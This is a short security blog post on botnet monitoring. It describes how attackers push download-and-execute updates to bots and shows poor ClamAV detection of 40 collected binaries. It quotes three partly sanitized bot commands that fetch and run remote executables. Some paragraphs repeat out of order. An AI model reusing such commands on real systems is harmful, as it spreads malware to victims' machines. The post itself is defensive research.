Botnet Monitoring And New Malware Samples
Tuesday, January 9. 2007
When monitoring botnets, you will often see updates within the channel used for command and control. Update means that the bots are instructed to download and execute a binary file from a particular address. A few (sanitized) examples are:
These updates are used by the attackers for different purposes, e.g., migrating the whole botnet to a new C&C server or adding new functionality to the bots. Since these binaries are not actively spreading in the wild, it is rather hard for common antivirus engines to add detection support for them. We collected 40 binaries in the last few weeks this way and ClamAV has rather bad detection rates for them:
Seems like it is a long way until we can rely on AV...
.D0wnL04dF3nR8o http://www.debbiematenopoulos.tv/[...]/timer2.exe c:\timer222.exe 1 -s
!tryagain http://www.freewebtown.com/[...]/a9.exe
.update.g0d http://www.geocities.com/[...]/SkuZ.exe 1
These updates are used by the attackers for different purposes, e.g., migrating the whole botnet to a new C&C server or adding new functionality to the bots. Since these binaries are not actively spreading in the wild, it is rather hard for common antivirus engines to add detection support for them. We collected 40 binaries in the last few weeks this way and ClamAV has rather bad detection rates for them:
----------- SCAN SUMMARY -----------
Known viruses: 86219
Engine version: 0.88.5
Scanned directories: 0
Scanned files: 40
Infected files: 12
Data scanned: 12.66 MB
Seems like it is a long way until we can rely on AV...
".
